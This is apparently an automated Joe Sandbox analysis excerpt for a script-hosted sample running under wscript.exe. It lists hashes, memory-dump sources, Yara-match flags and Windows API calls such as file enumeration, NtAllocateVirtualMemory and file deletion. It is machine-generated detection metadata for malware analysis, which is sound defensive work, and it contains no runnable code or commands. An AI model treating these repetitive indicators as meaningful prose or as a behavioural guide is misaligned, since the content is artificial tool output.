                                                                                                                                                                              • Opcode Fuzzy Hash: eb4e7de90207b2a2ded5fb3b2f0221026bf530ae155b410f37b8dc976d0e8b92
                                                                                                                                                                              • Instruction Fuzzy Hash: 07814875D10269DBDB31DB54CC45BEEB7B8AB08710F0445EAA91AB7280E7709EC0CFA0

                                                                                                                                                                              Execution Graph

                                                                                                                                                                              Execution Coverage:3%
                                                                                                                                                                              Dynamic/Decrypted Code Coverage:4%
                                                                                                                                                                              Signature Coverage:2%
                                                                                                                                                                              Total number of Nodes:504
                                                                                                                                                                              Total number of Limit Nodes:77

                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                              • Executed
                                                                                                                                                                              • Not Executed
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.4498452049.0000000000350000.00000040.80000000.00040000.00000000.sdmp, Offset: 00350000, based on PE: false
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_350000_wscript.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: s$ $%$+i$._$7$;w$<$$B$C^$C^K?$I}$K?$M$N$P$Q|K?C^$TN$c$ox$zs$~h$x
                                                                                                                                                                              • API String ID: 0-2531995965
                                                                                                                                                                              • Opcode ID: 3161732efd6fe289b85b6be9f3dda6b8f5280edbe91bf05dc45768a539010ced
                                                                                                                                                                              • Instruction ID: 70df6abe8b6068d61c441fd8acf726b965a451b8fc96f58a39b68db8e48b044b
                                                                                                                                                                              • Opcode Fuzzy Hash: 3161732efd6fe289b85b6be9f3dda6b8f5280edbe91bf05dc45768a539010ced
                                                                                                                                                                              • Instruction Fuzzy Hash: 5B12F0B0D04628CBDB25CF98C895BEDBBB1BB45309F2081D9D40DAB391C7B45A89EF41
                                                                                                                                                                              APIs
                                                                                                                                                                              • FindFirstFileW.KERNELBASE(?,00000000), ref: 0036C884
                                                                                                                                                                              • FindNextFileW.KERNELBASE(?,00000010), ref: 0036C8BF
                                                                                                                                                                              • FindClose.KERNELBASE(?), ref: 0036C8CA
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.4498452049.0000000000350000.00000040.80000000.00040000.00000000.sdmp, Offset: 00350000, based on PE: false
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_350000_wscript.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Find$File$CloseFirstNext
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3541575487-0
                                                                                                                                                                              • Opcode ID: 7cd730f5b36d08e486d7cc197b06d5cfbfbdc64cf19af670e2e99e4c225fd556
                                                                                                                                                                              • Instruction ID: 4c91a7fb4248e6b69ee3863778d8a80c42dd7d43ffbb43ae57a3d693992b2547
                                                                                                                                                                              • Opcode Fuzzy Hash: 7cd730f5b36d08e486d7cc197b06d5cfbfbdc64cf19af670e2e99e4c225fd556
                                                                                                                                                                              • Instruction Fuzzy Hash: D8316272900348BBDB31EBA4CC85FFE777CAF84744F148559B949AA190D670AE448BA0
                                                                                                                                                                              APIs
                                                                                                                                                                              • NtCreateFile.NTDLL(?,?,?,?,?,52D358EE,?,?,?,?,?), ref: 003794C1
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.4498452049.0000000000350000.00000040.80000000.00040000.00000000.sdmp, Offset: 00350000, based on PE: false
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_350000_wscript.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CreateFile
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 823142352-0
                                                                                                                                                                              • Opcode ID: 960bb6eeaca8ad18d0762e7e9371157d7f311785338fbc4ead58f158bfb04b6c
                                                                                                                                                                              • Instruction ID: abae2e5ab535f2cfe4fcec10cba7c1779ea7ae55d72bbffd41f1b52e2efd2ba1
                                                                                                                                                                              • Opcode Fuzzy Hash: 960bb6eeaca8ad18d0762e7e9371157d7f311785338fbc4ead58f158bfb04b6c
                                                                                                                                                                              • Instruction Fuzzy Hash: 9E31B2B5A01208AFDB54DF99D881EEFB7B9EF8C314F108209F918A7340D774A851CBA5
                                                                                                                                                                              APIs
                                                                                                                                                                              • NtReadFile.NTDLL(?,?,?,?,?,52D358EE,?,?,?), ref: 00379619
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.4498452049.0000000000350000.00000040.80000000.00040000.00000000.sdmp, Offset: 00350000, based on PE: false
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_350000_wscript.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: FileRead
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2738559852-0
                                                                                                                                                                              • Opcode ID: 581bb27bbab1dcbc52c7cb802448ab171566f2e7f7abfad416baabf1a2ee80fe
                                                                                                                                                                              • Instruction ID: dc722b09c79230f9044da836331c9b465fedb178185b57ee2ea1c9c10def65d0
                                                                                                                                                                              • Opcode Fuzzy Hash: 581bb27bbab1dcbc52c7cb802448ab171566f2e7f7abfad416baabf1a2ee80fe
                                                                                                                                                                              • Instruction Fuzzy Hash: 2A31E5B5A00208AFDB14DF98D881EEFB7B9EF88714F008209FD18A7340D774A9118BA5
                                                                                                                                                                              APIs
                                                                                                                                                                              • NtAllocateVirtualMemory.NTDLL(00361F1E,?,0037819F,00000000,00000004,52D358EE,?,?,?,?,?,0037819F,00361F1E,0037819F,8DFFFEB0,00361F1E), ref: 00379918
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.4498452049.0000000000350000.00000040.80000000.00040000.00000000.sdmp, Offset: 00350000, based on PE: false
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_350000_wscript.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: AllocateMemoryVirtual
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2167126740-0
                                                                                                                                                                              • Opcode ID: 6004a6bbdfe21b5548b800a046e4eb376e4922fae85fb4f880ad311e9dcb8410
                                                                                                                                                                              • Instruction ID: cfa018433297a8d4ca509dd83a5fbab744d93009d4617c430282e2b42bfd6a0f
                                                                                                                                                                              • Opcode Fuzzy Hash: 6004a6bbdfe21b5548b800a046e4eb376e4922fae85fb4f880ad311e9dcb8410
                                                                                                                                                                              • Instruction Fuzzy Hash: 16210AB5A00608ABDB14DF99DC41EEFB7B9EF89710F008209FD18A7241D774A811CBA5
                                                                                                                                                                              APIs
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.4498452049.0000000000350000.00000040.80000000.00040000.00000000.sdmp, Offset: 00350000, based on PE: false
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_350000_wscript.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: DeleteFile
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 4033686569-0
                                                                                                                                                                              • Opcode ID: 70da47c343d85739f71d4273104cf6cbe2ee008118fb00db453942dce7088fb3
                                                                                                                                                                              • Instruction ID: 73d77918e5617311994c941b6c6e9900dc9643a83f0568a88989c226259eb272
                                                                                                                                                                              • Opcode Fuzzy Hash: 70da47c343d85739f71d4273104cf6cbe2ee008118fb00db453942dce7088fb3
                                                                                                                                                                              • Instruction Fuzzy Hash: 4711A3716006187BD721EB65CC45FEF776CEF85710F008109F9086B281DBB5A81587A5
                                                                                                                                                                              APIs
                                                                                                                                                                              • NtClose.NTDLL(?,?,001F0001,?,00000000,?,00000000,00000104), ref: 00379717
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.4498452049.0000000000350000.00000040.80000000.00040000.00000000.sdmp, Offset: 00350000, based on PE: false
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_350000_wscript.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Close
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3535843008-0
                                                                                                                                                                              • Opcode ID: 28e2915287915a0d41cf43200706cdba27b30fd896c2b55e5b9696efd4849daf
                                                                                                                                                                              • Instruction ID: 88cdeb005ef5370884120ea476c7616f212340199ae05b6cb2fafa9cd8c11cbb
                                                                                                                                                                              • Opcode Fuzzy Hash: 28e2915287915a0d41cf43200706cdba27b30fd896c2b55e5b9696efd4849daf
                                                                                                                                                                              • Instruction Fuzzy Hash: 71E08C362412087BD620EA6ADC41FEF776CDFC6720F408415FA49AB251CB70B91587F1
                                                                                                                                                                              APIs
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.4500264920.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048C0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.4500264920.00000000049E9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                              • Associated: 0000000C.00000002.4500264920.00000000049ED000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                              • Associated: 0000000C.00000002.4500264920.0000000004A5E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_48c0000_wscript.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2994545307-0
                                                                                                                                                                              • Opcode ID: 99f998fca2ab6335db0762973854f17e5c8b31511b66a60156a0f45672d07f26
                                                                                                                                                                              • Instruction ID: c0db5b3531dc9b65aad5a76c451c2570879225e27fc3a1a6c5d1806525b8da28
                                                                                                                                                                              • Opcode Fuzzy Hash: 99f998fca2ab6335db0762973854f17e5c8b31511b66a60156a0f45672d07f26
                                                                                                                                                                              • Instruction Fuzzy Hash: 5290023560560402F100B1588528B0610498BD0205F65C421E042556CD87D5DA5165A2
                                                                                                                                                                              APIs
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.4500264920.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048C0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.4500264920.00000000049E9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                              • Associated: 0000000C.00000002.4500264920.00000000049ED000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                              • Associated: 0000000C.00000002.4500264920.0000000004A5E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_48c0000_wscript.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2994545307-0
                                                                                                                                                                              • Opcode ID: 3f88cc9985106ac348b350dd7982c423162ec201d1e9afd067c8b7313fdba176
                                                                                                                                                                              • Instruction ID: a5c8ad6b1e93656520f15db3d02f22c5573700adb3b8786d10cc73635fa1f418
                                                                                                                                                                              • Opcode Fuzzy Hash: 3f88cc9985106ac348b350dd7982c423162ec201d1e9afd067c8b7313fdba176
                                                                                                                                                                              • Instruction Fuzzy Hash: 62900265601600426140B158881880660499BE1305395C125E0555564C8658D9559269
                                                                                                                                                                              APIs
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.4500264920.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048C0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.4500264920.00000000049E9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                              • Associated: 0000000C.00000002.4500264920.00000000049ED000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                              • Associated: 0000000C.00000002.4500264920.0000000004A5E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_48c0000_wscript.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2994545307-0
                                                                                                                                                                              • Opcode ID: 01495d9544c197c9b26de20eab6ef24dd2274bbd88aa9c8f4b54e240e7c357ef
                                                                                                                                                                              • Instruction ID: 7b65fac3eff9389875ba1a4bad2f8fc16b58fea96039887cc2ba1d8b585096c5
                                                                                                                                                                              • Opcode Fuzzy Hash: 01495d9544c197c9b26de20eab6ef24dd2274bbd88aa9c8f4b54e240e7c357ef
                                                                                                                                                                              • Instruction Fuzzy Hash: C890022524150802F140B158C428B07004ACBD0605F55C021E0025558D8656DA6566B1
                                                                                                                                                                              APIs
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.4500264920.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048C0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.4500264920.00000000049E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.4500264920.00000000049ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.4500264920.0000000004A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_48c0000_wscript.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2994545307-0
                                                                                                                                                                              • Opcode ID: 60d30d47839fcb52508af1761b9a9218327a25e665c2f21f7ef5b9fac9958827
                                                                                                                                                                              • Instruction ID: 3fbd38631cf730d9e825afc6627a2b12637dbbcfc24db0bfcf822cded4017932
                                                                                                                                                                              • Opcode Fuzzy Hash: 60d30d47839fcb52508af1761b9a9218327a25e665c2f21f7ef5b9fac9958827
                                                                                                                                                                              • Instruction Fuzzy Hash: C790023560590012B140B158889894640499BE0305B55C021E0425558C8A54DA565361
                                                                                                                                                                              APIs
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.4500264920.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048C0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.4500264920.00000000049E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.4500264920.00000000049ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.4500264920.0000000004A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_48c0000_wscript.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2994545307-0
                                                                                                                                                                              • Opcode ID: d3470e90b81a6e9e735797e269833707d5676ef4f6b79c628361ed241aa139b4
                                                                                                                                                                              • Instruction ID: 681a635deabfe791c52d1cd90f7ab4011306964df7241819b372a7bf2ce00dd2
                                                                                                                                                                              • Opcode Fuzzy Hash: d3470e90b81a6e9e735797e269833707d5676ef4f6b79c628361ed241aa139b4
                                                                                                                                                                              • Instruction Fuzzy Hash: 5590023520150402F100B598941CA4600498BE0305F55D021E5025559EC6A5D9916131
                                                                                                                                                                              APIs
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.4500264920.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048C0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.4500264920.00000000049E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.4500264920.00000000049ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.4500264920.0000000004A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_48c0000_wscript.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2994545307-0
                                                                                                                                                                              • Opcode ID: 276bd4cd051a5bdd023aa834022ac85c5fed138bf5014d3d0f2536326e01a50d
                                                                                                                                                                              • Instruction ID: 0da4773984aea5eaf942a370d48a7b9044146d95fdceaa1dd7400cc75d154758
                                                                                                                                                                              • Opcode Fuzzy Hash: 276bd4cd051a5bdd023aa834022ac85c5fed138bf5014d3d0f2536326e01a50d
                                                                                                                                                                              • Instruction Fuzzy Hash: D290023520158802F110B158C418B4A00498BD0305F59C421E442565CD86D5D9917121
                                                                                                                                                                              APIs
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.4500264920.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048C0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.4500264920.00000000049E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.4500264920.00000000049ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.4500264920.0000000004A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_48c0000_wscript.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2994545307-0
                                                                                                                                                                              • Opcode ID: 9d2e2b86f090c54ddd70f46a54194ec2881cedd48fd1edb197422abdf0f48205
                                                                                                                                                                              • Instruction ID: 939e46e6c7996b26333a8719832f99d01068b269c610700c424ffb959fcc53da
                                                                                                                                                                              • Opcode Fuzzy Hash: 9d2e2b86f090c54ddd70f46a54194ec2881cedd48fd1edb197422abdf0f48205
                                                                                                                                                                              • Instruction Fuzzy Hash: 9490023520150842F100B1588418F4600498BE0305F55C026E0125658D8655D9517521
                                                                                                                                                                              APIs
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.4500264920.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048C0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.4500264920.00000000049E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.4500264920.00000000049ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.4500264920.0000000004A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_48c0000_wscript.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2994545307-0
                                                                                                                                                                              • Opcode ID: b2bd87229556cec1de83a67a9b50ff6d92c10c88ecedf6a0761a46d7f9189716
                                                                                                                                                                              • Instruction ID: 6ef62f75cf2e3a3b1518c36594523c7050ebbc5c5a386bafdd67e38cff1de781
                                                                                                                                                                              • Opcode Fuzzy Hash: b2bd87229556cec1de83a67a9b50ff6d92c10c88ecedf6a0761a46d7f9189716
                                                                                                                                                                              • Instruction Fuzzy Hash: A4900225242541527545F1588418907404A9BE0245795C022E1415954C8566E956D621
                                                                                                                                                                              APIs
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.4500264920.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048C0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.4500264920.00000000049E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.4500264920.00000000049ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.4500264920.0000000004A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_48c0000_wscript.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2994545307-0
                                                                                                                                                                              • Opcode ID: b32e95311af4ceebfd8cfdda0b8c56c31dc1918fe7dd90fcb5b8a7967aac0c13
                                                                                                                                                                              • Instruction ID: 5ee2df65e0e44c74cc4d813c9151b57c845387bdf1cfaff175db23731c6a51d5
                                                                                                                                                                              • Opcode Fuzzy Hash: b32e95311af4ceebfd8cfdda0b8c56c31dc1918fe7dd90fcb5b8a7967aac0c13
                                                                                                                                                                              • Instruction Fuzzy Hash: 6D90023520150413F111B1588518B07004D8BD0245F95C422E042555CD9696DA52A121
                                                                                                                                                                              APIs
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.4500264920.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048C0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.4500264920.00000000049E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.4500264920.00000000049ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.4500264920.0000000004A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_48c0000_wscript.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2994545307-0
                                                                                                                                                                              • Opcode ID: 80bd511f89bbdddd7a389b7be525654e96708832f359b9d17122cb3f7b302de0
                                                                                                                                                                              • Instruction ID: 21994780fa133bde2624398fbe58e68d9cb8771553cadd8e898d722d3ac3c282
                                                                                                                                                                              • Opcode Fuzzy Hash: 80bd511f89bbdddd7a389b7be525654e96708832f359b9d17122cb3f7b302de0
                                                                                                                                                                              • Instruction Fuzzy Hash: A390022D21350002F180B158941CA0A00498BD1206F95D425E001655CCC955D9695321
                                                                                                                                                                              APIs
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.4500264920.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048C0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.4500264920.00000000049E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.4500264920.00000000049ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.4500264920.0000000004A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_48c0000_wscript.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2994545307-0
                                                                                                                                                                              • Opcode ID: 0fec4661757e62864c5d0b5806068b3e6d1853ae0e889d6cd48429f6f2677ddf
                                                                                                                                                                              • Instruction ID: 99762d1cd62cfcef272c40125bab16b01ef0f8c755e183900e361446c7c3f45d
                                                                                                                                                                              • Opcode Fuzzy Hash: 0fec4661757e62864c5d0b5806068b3e6d1853ae0e889d6cd48429f6f2677ddf
                                                                                                                                                                              • Instruction Fuzzy Hash: FE90022530150003F140B158942CA064049DBE1305F55D021E0415558CD955D9565222
                                                                                                                                                                              APIs
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.4500264920.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048C0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.4500264920.00000000049E9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                              • Associated: 0000000C.00000002.4500264920.00000000049ED000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                              • Associated: 0000000C.00000002.4500264920.0000000004A5E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_48c0000_wscript.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2994545307-0
                                                                                                                                                                              • Opcode ID: 02381c6b7afa61a9b952a8906fc8450755ac8036ac185abc936a2f32174d13ab
                                                                                                                                                                              • Instruction ID: 7133b8f3540a2f18d23b8093ad914eac3c9b7bb58f50584fd76a2ef6690e5fea
                                                                                                                                                                              • Opcode Fuzzy Hash: 02381c6b7afa61a9b952a8906fc8450755ac8036ac185abc936a2f32174d13ab
                                                                                                                                                                              • Instruction Fuzzy Hash: 5F90022560150502F101B1588418A16004E8BD0245F95C032E1025559ECA65DA92A131
                                                                                                                                                                              APIs
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.4500264920.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048C0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.4500264920.00000000049E9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                              • Associated: 0000000C.00000002.4500264920.00000000049ED000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                              • Associated: 0000000C.00000002.4500264920.0000000004A5E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_48c0000_wscript.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2994545307-0
                                                                                                                                                                              • Opcode ID: cdedc403efff10094581a8a897c448b23da598cbfc40c6d268ad5a0f866132e9
                                                                                                                                                                              • Instruction ID: bfb5d542e3f125a0fedbdcbcfb4712483349c0fd52c99b814cc7253cd836d9e8
                                                                                                                                                                              • Opcode Fuzzy Hash: cdedc403efff10094581a8a897c448b23da598cbfc40c6d268ad5a0f866132e9
                                                                                                                                                                              • Instruction Fuzzy Hash: 5390026520190403F140B5588818A0700498BD0306F55C021E2065559E8A69DD516135
                                                                                                                                                                              APIs
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.4500264920.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048C0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.4500264920.00000000049E9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                              • Associated: 0000000C.00000002.4500264920.00000000049ED000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                              • Associated: 0000000C.00000002.4500264920.0000000004A5E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_48c0000_wscript.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2994545307-0
                                                                                                                                                                              • Opcode ID: f1790ad94cc31210733e13808297d3ca248e78e41c3be87f6f76e3480d15acdc
                                                                                                                                                                              • Instruction ID: b4d8f5856478c48585bd5b44510885579fef50da87633a7fdbc840cb7fc382e1
                                                                                                                                                                              • Opcode Fuzzy Hash: f1790ad94cc31210733e13808297d3ca248e78e41c3be87f6f76e3480d15acdc
                                                                                                                                                                              • Instruction Fuzzy Hash: F5900225601500426140B168C858D064049AFE1215755C131E0999554D8599D9655665
                                                                                                                                                                              APIs
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.4500264920.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048C0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.4500264920.00000000049E9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                              • Associated: 0000000C.00000002.4500264920.00000000049ED000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                              • Associated: 0000000C.00000002.4500264920.0000000004A5E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_48c0000_wscript.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2994545307-0
